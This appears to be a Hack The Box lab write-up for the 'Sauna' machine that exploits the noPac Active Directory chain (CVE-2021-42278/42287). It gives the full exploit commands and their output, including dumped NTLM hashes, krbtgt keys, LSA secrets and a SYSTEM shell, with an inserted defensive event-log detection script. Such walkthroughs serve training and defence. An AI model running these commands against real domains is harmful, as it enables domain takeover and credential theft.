CVE-2021-42278/CVE-2021-42287


The target system might be vulnerable to the CVE-2021-42278 + CVE-2021-42287 chain attack, given that it is relatively old and does not appear to have the patch for it installed.

By default, any domain user has the SeMachineAccountPrivilege privilege enabled, and I have already confirmed that the fsmith user has this privilege enabled. Additionally, users with this privilege can add up to 10 devices to the domain. This can be checked both locally and remotely.

*evil-winrm* ps c:\Users\FSmith\Documents> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota
 
 
distinguishedname         : DC=EGOTISTICAL-BANK,DC=LOCAL
ms-ds-machineaccountquota : 10
name                      : EGOTISTICAL-BANK
objectclass               : domainDNS
objectguid                : 504e06ec-22c1-43a1-93c0-cf4807f83363
 

Notice that the ms-DS-MachineAccountQuota attribute is set to 10.

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ ldapsearch -x -h ldap://egotistical-bank.local:389 -D '' -w '' -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -LLL | grep -w ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10

Through ldapsearch, the same attribute can also be checked remotely, here with an anonymous bind.

Exploit (noPac)


The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating the domain controller through a fake computer account: the attacker creates a machine account and changes its sAMAccountName to the DC's name without the trailing $ sign, so that the KDC ends up issuing tickets on behalf of the DC itself.
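From the defender's side, the sequence described above leaves a recognisable trail in the Security log of the domain controller: a computer account is created by an ordinary user (event 4741), its name is changed to one without the trailing $ (event 4781), and shortly afterwards the name is changed back. The following script is an added example, not code from the writeup or from the noPac project; it runs simple detection rules over constructed event records shaped like the data fields of those two events. The DC hostname set, the allow-list of accounts permitted to join computers, and the sample events are all assumptions for illustration.

```python
"""Flag the AD account changes a noPac-style chain leaves in the Security log.

Added example (not part of the original writeup or the noPac project).
Assumptions: events are dicts whose keys mirror the data fields of Windows
Security events 4741 (computer account created) and 4781 (account renamed);
DC_HOSTNAMES and JOIN_ALLOWLIST are placeholders for a real environment.
"""
from dataclasses import dataclass

# Hostnames of domain controllers without the trailing '$' (placeholder set).
DC_HOSTNAMES = {"SAUNA"}
# Principals that are expected to create computer objects (placeholder allow-list).
JOIN_ALLOWLIST = {"svc_join"}


@dataclass
class Finding:
    severity: str
    event_id: int
    subject: str
    detail: str


def is_computer_name(sam: str) -> bool:
    """Computer accounts carry a trailing '$' in their sAMAccountName."""
    return sam.endswith("$")


def analyse(events):
    """Return a Finding for every event that matches one of the rules below."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        subject = ev["SubjectUserName"]
        if eid == 4741:
            # Any domain user may create up to ms-DS-MachineAccountQuota
            # computer objects by default; a creation by a principal that is
            # not supposed to join machines is the first step of the chain.
            if subject not in JOIN_ALLOWLIST:
                findings.append(Finding(
                    "medium", eid, subject,
                    f"computer {ev['TargetUserName']} created by non-allow-listed account"))
        elif eid == 4781:
            old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
            if is_computer_name(old) and not is_computer_name(new):
                # A computer account losing its '$' is the CVE-2021-42278 step;
                # it is critical when the new name collides with a DC hostname.
                if new.upper() in DC_HOSTNAMES:
                    findings.append(Finding(
                        "critical", eid, subject,
                        f"computer {old} renamed to {new!r}: trailing '$' dropped, matches a DC name"))
                else:
                    findings.append(Finding(
                        "high", eid, subject,
                        f"computer {old} renamed to {new!r}: trailing '$' dropped"))
            elif not is_computer_name(old) and is_computer_name(new):
                # Renaming back to a '$' name is the clean-up step of the chain.
                findings.append(Finding(
                    "low", eid, subject,
                    f"{old} renamed back to {new}: possible clean-up of a spoofed name"))
    return findings


# Constructed sample events modelled on the sequence shown in the writeup
# (create, rename to the DC's name, rename back), plus two benign records.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "fsmith", "TargetUserName": "WIN-ARGRI7MJOKU$"},
    {"EventID": 4781, "SubjectUserName": "fsmith",
     "OldTargetUserName": "WIN-ARGRI7MJOKU$", "NewTargetUserName": "sauna"},
    {"EventID": 4781, "SubjectUserName": "fsmith",
     "OldTargetUserName": "sauna", "NewTargetUserName": "WIN-ARGRI7MJOKU$"},
    {"EventID": 4781, "SubjectUserName": "svc_join",
     "OldTargetUserName": "WS01$", "NewTargetUserName": "WS02$"},
    {"EventID": 4741, "SubjectUserName": "svc_join", "TargetUserName": "WS03$"},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"[{f.severity}] event {f.event_id} by {f.subject}: {f.detail}")
```

The benign rename and the allow-listed creation produce no findings; the three attacker steps do, with the rename to the DC's name rated critical. In a real deployment the same rules would be fed from the event XML (the field names used here match the data elements of 4741 and 4781), and the critical rule is worth alerting on regardless of patch level, since the rename itself should never happen legitimately.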

Testing


┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ cme smb $IP -d EGOTISTICAL-BANK.LOCAL --kdcHost sauna.egotistical-bank.local -u fsmith -p Thestrokes23 -M nopac
smb         10.10.10.175    445    sauna            [*] windows 10.0 build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
smb         10.10.10.175    445    sauna            [+] egotistical-bank.local\fsmith:Thestrokes23 
NOPAC       10.10.10.175    445    SAUNA            TGT with PAC size 1580
NOPAC       10.10.10.175    445    SAUNA            TGT without PAC size 775
NOPAC       10.10.10.175    445    SAUNA            
NOPAC       10.10.10.175    445    SAUNA            VULNEABLE
nopac       10.10.10.175    445    sauna            next step: https://github.com/Ridter/noPac

CrackMapExec has a module, nopac, for testing the vulnerability above. It requests one TGT with a PAC and one without; a patched KDC includes the PAC regardless, so the two tickets come out the same size, whereas here the PAC-less ticket is clearly smaller (775 vs 1580 bytes). As the result above shows, the target system is confirmed to be vulnerable.

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/sauna/noPac]
└─$ python3 noPac.py 'EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23' --impersonate administrator -dc-ip $IP -use-ldap -dump 
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target sauna.egotistical-bank.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-ARGRI7MJOKU$"
[*] MachineAccount "WIN-ARGRI7MJOKU$" password = H$rvmdIx2^fx
[*] Successfully added machine account WIN-ARGRI7MJOKU$ with password H$rvmdIx2^fx.
[*] WIN-ARGRI7MJOKU$ object = CN=WIN-ARGRI7MJOKU,CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
[*] WIN-ARGRI7MJOKU$ sAMAccountName == sauna
[*] Saving a DC's ticket in sauna.ccache
[*] Reseting the machine account to WIN-ARGRI7MJOKU$
[*] Restored WIN-ARGRI7MJOKU$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_sauna.egotistical-bank.local.ccache
[*] Attempting to del a computer with the name: WIN-ARGRI7MJOKU$
[-] Delete computer WIN-ARGRI7MJOKU$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x6d261a4763682dbf58336ec3dc7ff268
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
EGOTISTICALBANK\SAUNA$:plain_password_hex:0bf15d9433742c2773d5972b72d04f812ede58d233bc1cd4d9a31497a887029baff4a2c19bfb5931457377d25027d21e428500712821d8890413fe61d09c7cfbe45c5f115a14c00c04e99e6432813588506f68f90836dddf561b513478526cd0ee6066c0db0f51b731668d1fe3ddb33f8a44ee25037693b854ad4204065542a5a4334c6e86142e7ea0784379f6378cfd771e2f278d71b7e8c2db27c3f7b351e50e63d997f49addc1828c110b2df5a2673621e310e1f8ab1fa566e38eb369e97468b99f403cee6ceadb865be6817e737b238574d753e1267a3e4f7cc57fe5e10c92b884421c6759f958d3fd5fa3370c60
EGOTISTICALBANK\SAUNA$:aad3b435b51404eeaad3b435b51404ee:5dc91efb42d910e053e11dffa46bf5d6:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x2460a9de840f81ad5f31efc8b864e55672bd8c44
dpapi_userkey:0x466a52963a9bc1175c7b9109f3cae6bf1b46989e
[*] NL$KM 
 0000   87 2B 1B 92 A2 F4 CC 90  DF FF F7 A1 A4 50 61 C3   .+...........Pa.
 0010   4A 11 6B B6 89 3D CD A0  E0 4D 40 61 A2 7F 79 68   J.k..=...M@a..yh
 0020   9C CF BD 0C 8B F2 96 B9  74 42 A0 53 F4 09 32 0A   ........tB.S..2.
 0030   8F 86 0E 5F 5A BD ED 1A  84 0F 66 0E A1 52 BC 7B   ..._Z.....f..R.{
NL$KM:872b1b92a2f4cc90dffff7a1a45061c34a116bb6893dcda0e04d4061a27f79689ccfbd0c8bf296b97442a053f409320a8f860e5f5abded1a840f660ea152bc7b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:5dc91efb42d910e053e11dffa46bf5d6:::
WIN-AVOBJSNQI4E$:4101:aad3b435b51404eeaad3b435b51404ee:f5d7c0e3775ca7a325a2d9ea1d6aa85c:::
WIN-ARGRI7MJOKU$:4102:aad3b435b51404eeaad3b435b51404ee:c8c3b17e8cbb1ad86660af0c61a221e4:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:169b40d92b9b50b70712649ec010a4941314a10e61443b9249bc483d94012825
SAUNA$:aes128-cts-hmac-sha1-96:5a9b17710de61c6181ca21a297276b0e
SAUNA$:des-cbc-md5:ef6d38977fea32d9
WIN-AVOBJSNQI4E$:aes256-cts-hmac-sha1-96:ae10bf959b90ebbeecd67b223b6974d235f8118dcd870e72fb25090577a86fd6
WIN-AVOBJSNQI4E$:aes128-cts-hmac-sha1-96:b5b6c8e3a72a3d8bdaedcf4e5e305d3d
WIN-AVOBJSNQI4E$:des-cbc-md5:2643d5f410e515fe
WIN-ARGRI7MJOKU$:aes256-cts-hmac-sha1-96:ebeb999cdaae3ebccdd641a8be90b75a915dfa8db22b78174e4e90b0849353df
WIN-ARGRI7MJOKU$:aes128-cts-hmac-sha1-96:e84073c311e90e0fa4dd96cfc1d94dcc
WIN-ARGRI7MJOKU$:des-cbc-md5:202f04a17c542513
[*] Cleaning up... 

Domain Level Compromise

ShellDrop


┌──(kali㉿kali)-[~/…/htb/labs/sauna/noPac]
└─$ python3 nopac.py 'egotistical-bank.local/fsmith:Thestrokes23' -dc-ip $IP -use-ldap -shell
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target sauna.egotistical-bank.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-IK7ZYRL5NJL$"
[*] MachineAccount "WIN-IK7ZYRL5NJL$" password = S0BGOl#xd7M5
[*] Successfully added machine account WIN-IK7ZYRL5NJL$ with password S0BGOl#xd7M5.
[*] WIN-IK7ZYRL5NJL$ object = CN=WIN-IK7ZYRL5NJL,CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
[*] WIN-IK7ZYRL5NJL$ sAMAccountName == sauna
[*] Saving a DC's ticket in sauna.ccache
[*] Reseting the machine account to WIN-IK7ZYRL5NJL$
[*] Restored WIN-IK7ZYRL5NJL$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_sauna.egotistical-bank.local.ccache
[*] attempting to del a computer with the name: WIN-IK7ZYRL5NJL$
[-] Delete computer WIN-IK7ZYRL5NJL$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
SAUNA
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::17a
   ipv6 address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
   link-local ipv6 address . . . . . : fe80::64df:5bff:4879:1d8b%7
   ipv4 address. . . . . . . . . . . : 10.10.10.175
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
                                       10.10.10.2

System Level Compromise